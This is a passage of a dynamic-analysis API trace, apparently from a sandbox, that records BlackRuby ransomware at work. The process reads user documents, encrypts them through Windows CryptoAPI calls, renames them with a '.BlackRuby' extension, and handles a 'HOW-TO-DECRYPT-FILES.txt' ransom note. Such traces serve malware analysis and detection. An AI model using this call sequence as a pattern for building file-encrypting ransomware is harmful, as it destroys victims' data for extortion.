0x1 [0058.804] GetFileType (hFile=0x184) returned 0x1 [0058.805] CloseHandle (hObject=0x184) returned 1 [0058.805] GetLastError () returned 0x0 [0058.805] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e744, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x78 [0058.805] GetLastError () returned 0x0 [0058.805] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0058.805] GetLastError () returned 0x0 [0058.805] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx", lpFilePart=0x0) returned 0x71 [0058.805] GetLastError () returned 0x0 [0058.805] SetErrorMode (uMode=0x1) returned 0x0 [0058.805] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\aplucgimlf79.docx"), fInfoLevelId=0x0, lpFileInformation=0x1b5a630 | out: lpFileInformation=0x1b5a630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1df12ac0, ftCreationTime.dwHighDateTime=0x1d356da, ftLastAccessTime.dwLowDateTime=0xf8a3b460, ftLastAccessTime.dwHighDateTime=0x1d356af, ftLastWriteTime.dwLowDateTime=0xf8a3b460, ftLastWriteTime.dwHighDateTime=0x1d356af, nFileSizeHigh=0x0, nFileSizeLow=0xc334)) returned 1 [0058.805] GetLastError () returned 0x0 [0058.805] SetErrorMode (uMode=0x0) returned 0x1 [0058.806] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx", lpFilePart=0x0) returned 0x71 [0058.806] GetLastError () returned 0x0 [0058.806] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx", lpFilePart=0x0) returned 0x71 [0058.806] GetLastError () returned 0x0 [0058.806] SetErrorMode (uMode=0x1) returned 0x0 [0058.806] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\aplucgimlf79.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.806] GetLastError () returned 0x0 [0058.806] GetFileType (hFile=0x184) returned 0x1 [0058.806] SetErrorMode (uMode=0x0) returned 0x1 [0058.806] GetFileType (hFile=0x184) returned 0x1 [0058.806] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0xc334 [0058.806] GetLastError () returned 0x0 [0058.806] ReadFile (in: hFile=0x184, lpBuffer=0x1b5c75c, nNumberOfBytesToRead=0xc334, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1b5c75c*, lpNumberOfBytesRead=0x18eb68*=0xc334, lpOverlapped=0x0) returned 1 [0058.807] GetLastError () returned 0x0 [0058.807] CloseHandle (hObject=0x184) returned 1 [0058.807] GetLastError () returned 0x0 [0058.807] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx", lpFilePart=0x0) returned 0x71 [0058.807] GetLastError () returned 0x0 [0058.807] SetErrorMode (uMode=0x1) returned 0x0 [0058.807] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\aplucgimlf79.docx"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1df12ac0, ftCreationTime.dwHighDateTime=0x1d356da, ftLastAccessTime.dwLowDateTime=0xf8a3b460, ftLastAccessTime.dwHighDateTime=0x1d356af, ftLastWriteTime.dwLowDateTime=0xf8a3b460, ftLastWriteTime.dwHighDateTime=0x1d356af, nFileSizeHigh=0x0, nFileSizeLow=0xc334)) returned 1 [0058.807] GetLastError () returned 0x0 [0058.807] SetErrorMode (uMode=0x0) returned 0x1 [0058.807] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c790) returned 1 [0058.808] GetLastError () returned 0x0 [0058.842] CryptImportKey (in: hProv=0x37c790, pbData=0x1bcf204, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360d20) returned 1 [0058.842] GetLastError () returned 0x0 [0058.842] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.842] GetLastError () returned 0x0 [0058.847] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.847] GetLastError () returned 0x0 [0058.848] CryptDuplicateKey (in: hKey=0x360d20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360de0) returned 1 [0058.848] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.848] GetLastError () returned 0x0 [0058.848] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1bfc250*=0x1, dwFlags=0x0) returned 1 [0058.848] GetLastError () returned 0x0 [0058.848] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1bfc21c, dwFlags=0x0) returned 1 [0058.848] GetLastError () returned 0x0 [0058.848] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bfc298*, pdwDataLen=0x18eb58*=0xc430, dwBufLen=0xc430 | out: pbData=0x1bfc298*, pdwDataLen=0x18eb58*=0xc430) returned 1 [0058.848] GetLastError () returned 0x0 [0058.848] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c14b24*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1c14b24*, pdwDataLen=0x18eb70*=0x10) returned 1 [0058.848] GetLastError () returned 0x0 [0058.848] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c14b54*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1c14b54*, pdwDataLen=0x18eb78*=0x10) returned 1 [0058.848] GetLastError () returned 0x0 [0058.849] CryptDestroyKey (hKey=0x360d20) returned 1 [0058.849] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.849] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.849] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx", lpFilePart=0x0) returned 0x71 [0058.849] GetLastError () returned 0x0 [0058.849] SetErrorMode (uMode=0x1) returned 0x0 [0058.849] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\aplucgimlf79.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.850] GetLastError () returned 0xb7 [0058.850] GetFileType (hFile=0x184) returned 0x1 [0058.850] SetErrorMode (uMode=0x0) returned 0x1 [0058.850] GetFileType (hFile=0x184) returned 0x1 [0058.851] CloseHandle (hObject=0x184) returned 1 [0058.851] GetLastError () returned 0xb7 [0058.851] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx", lpFilePart=0x0) returned 0x71 [0058.851] GetLastError () returned 0xb7 [0058.851] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_0HsQNu4cOwzBmdY31ixs6SR5mSJVoykRsnaWBsgfjo8.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_0HsQNu4cOwzBmdY31ixs6SR5mSJVoykRsnaWBsgfjo8.BlackRuby", lpFilePart=0x0) returned 0x9f [0058.851] GetLastError () returned 0xb7 [0058.851] SetErrorMode (uMode=0x1) returned 0x0 [0058.851] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\aplucgimlf79.docx"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1df12ac0, ftCreationTime.dwHighDateTime=0x1d356da, ftLastAccessTime.dwLowDateTime=0xf8a3b460, ftLastAccessTime.dwHighDateTime=0x1d356af, ftLastWriteTime.dwLowDateTime=0x2b45f3e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xc440)) returned 1 [0058.852] GetLastError () returned 0xb7 [0058.852] SetErrorMode (uMode=0x0) returned 0x1 [0058.852] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\apLucGiMlF79.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\aplucgimlf79.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_0HsQNu4cOwzBmdY31ixs6SR5mSJVoykRsnaWBsgfjo8.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\encrypted_0hsqnu4cowzbmdy31ixs6sr5msjvoykrsnawbsgfjo8.blackruby")) returned 1 [0058.852] GetLastError () returned 0xb7 [0058.852] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x78 [0058.852] GetLastError () returned 0xb7 [0058.852] SetErrorMode (uMode=0x1) returned 0x0 [0058.852] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0058.852] GetLastError () returned 0x5 [0058.853] SetErrorMode (uMode=0x0) returned 0x1 [0058.853] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\dCjbI_GrVJl8jy.ppt", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\dCjbI_GrVJl8jy.ppt", lpFilePart=0x0) returned 0x72 [0058.853] GetLastError () returned 0x5 [0058.853] SetErrorMode (uMode=0x1) returned 0x0 [0058.853] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\dCjbI_GrVJl8jy.ppt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\dcjbi_grvjl8jy.ppt"), fInfoLevelId=0x0, lpFileInformation=0x1c3e7b8 | out: lpFileInformation=0x1c3e7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac137a60, ftCreationTime.dwHighDateTime=0x1d349f1, ftLastAccessTime.dwLowDateTime=0x636e3350, ftLastAccessTime.dwHighDateTime=0x1d35918, ftLastWriteTime.dwLowDateTime=0x636e3350, ftLastWriteTime.dwHighDateTime=0x1d35918, nFileSizeHigh=0x0, nFileSizeLow=0xaee9)) returned 1 [0058.853] GetLastError () returned 0x5 [0058.853] SetErrorMode (uMode=0x0) returned 0x1 [0058.854] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\dCjbI_GrVJl8jy.ppt", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\dCjbI_GrVJl8jy.ppt", lpFilePart=0x0) returned 0x72 [0058.854] GetLastError () returned 0x5 [0058.854] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\dCjbI_GrVJl8jy.ppt", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\dCjbI_GrVJl8jy.ppt", lpFilePart=0x0) returned 0x72 [0058.854] GetLastError () returned 0x5 [0058.854] SetErrorMode (uMode=0x1) returned 0x0 [0058.854] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\dCjbI_GrVJl8jy.ppt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\dcjbi_grvjl8jy.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.854] GetLastError () returned 0x0 [0058.854] GetFileType (hFile=0x184) returned 0x1 [0058.854] SetErrorMode (uMode=0x0) returned 0x1 [0058.854] GetFileType (hFile=0x184) returned 0x1 [0058.854] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0xaee9 [0058.854] GetLastError () returned 0x0 [0058.854] ReadFile (in: hFile=0x184, lpBuffer=0x1c404f8, nNumberOfBytesToRead=0xaee9, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1c404f8*, lpNumberOfBytesRead=0x18eb68*=0xaee9, lpOverlapped=0x0) returned 1 [0058.855] GetLastError () returned 0x0 [0058.855] CloseHandle (hObject=0x184) returned 1 [0058.855] GetLastError () returned 0x0 [0058.855] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\dCjbI_GrVJl8jy.ppt", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\dCjbI_GrVJl8jy.ppt", lpFilePart=0x0) returned 0x72 [0058.855] GetLastError () returned 0x0 [0058.855] SetErrorMode (uMode=0x1) returned 0x0 [0058.855] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\dCjbI_GrVJl8jy.ppt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\dcjbi_grvjl8jy.ppt"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac137a60, ftCreationTime.dwHighDateTime=0x1d349f1, ftLastAccessTime.dwLowDateTime=0x636e3350, ftLastAccessTime.dwHighDateTime=0x1d35918, ftLastWriteTime.dwLowDateTime=0x636e3350, ftLastWriteTime.dwHighDateTime=0x1d35918, nFileSizeHigh=0x0, nFileSizeLow=0xaee9)) returned 1 [0058.855] GetLastError () returned 0x0 [0058.855] SetErrorMode (uMode=0x0) returned 0x1 [0058.866] CryptImportKey (in: hProv=0x37c818, pbData=0x1cb0714, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360ce0) returned 1 [0058.866] GetLastError () returned 0x0 [0058.866] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.866] GetLastError () returned 0x0 [0058.871] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.871] GetLastError () returned 0x0 [0058.871] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360b20) returned 1 [0058.871] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.871] GetLastError () returned 0x0 [0058.871] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1cdd760*=0x1, dwFlags=0x0) returned 1 [0058.871] GetLastError () returned 0x0 [0058.871] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1cdd72c, dwFlags=0x0) returned 1 [0058.871] GetLastError () returned 0x0 [0058.871] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cdd7a8*, pdwDataLen=0x18eb58*=0xafe0, dwBufLen=0xafe0 | out: pbData=0x1cdd7a8*, pdwDataLen=0x18eb58*=0xafe0) returned 1 [0058.871] GetLastError () returned 0x0 [0058.871] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cf3794*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1cf3794*, pdwDataLen=0x18eb70*=0x10) returned 1 [0058.871] GetLastError () returned 0x0 [0058.871] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cf37c4*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1cf37c4*, pdwDataLen=0x18eb78*=0x10) returned 1 [0058.871] GetLastError () returned 0x0 [0058.872] CryptDestroyKey (hKey=0x360ce0) returned 1 [0058.872] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.872] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.872] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\dCjbI_GrVJl8jy.ppt", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\dCjbI_GrVJl8jy.ppt", lpFilePart=0x0) returned 0x72 [0058.872] GetLastError () returned 0x0 [0058.872] SetErrorMode (uMode=0x1) returned 0x0 [0058.873] GetFileType (hFile=0x184) returned 0x1 [0058.873] GetFileType (hFile=0x184) returned 0x1 [0058.874] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\dCjbI_GrVJl8jy.ppt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\dcjbi_grvjl8jy.ppt"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_w9udSxdRjZgUEXun0y08cPrg2rRUfK9L4CdSDv.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\encrypted_w9udsxdrjzguexun0y08cprg2rrufk9l4cdsdv.blackruby")) returned 1 [0058.874] GetLastError () returned 0xb7 [0058.875] SetErrorMode (uMode=0x0) returned 0x1 [0058.876] GetFileType (hFile=0x184) returned 0x1 [0058.876] GetFileType (hFile=0x184) returned 0x1 [0058.876] ReadFile (in: hFile=0x184, lpBuffer=0x1d1deac, nNumberOfBytesToRead=0x13987, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1d1deac*, lpNumberOfBytesRead=0x18eb68*=0x13987, lpOverlapped=0x0) returned 1 [0058.877] GetLastError () returned 0x0 [0058.914] CryptImportKey (in: hProv=0x37c680, pbData=0x1bb06a4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360ea0) returned 1 [0058.914] GetLastError () returned 0x0 [0058.914] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.914] GetLastError () returned 0x0 [0058.919] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.919] GetLastError () returned 0x0 [0058.919] CryptDuplicateKey (in: hKey=0x360ea0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360b20) returned 1 [0058.919] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.919] GetLastError () returned 0x0 [0058.919] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1bdd6f0*=0x1, dwFlags=0x0) returned 1 [0058.919] GetLastError () returned 0x0 [0058.919] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1bdd6bc, dwFlags=0x0) returned 1 [0058.919] GetLastError () returned 0x0 [0058.919] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bdd738*, pdwDataLen=0x18eb58*=0x13a80, dwBufLen=0x13a80 | out: pbData=0x1bdd738*, pdwDataLen=0x18eb58*=0x13a80) returned 1 [0058.920] GetLastError () returned 0x0 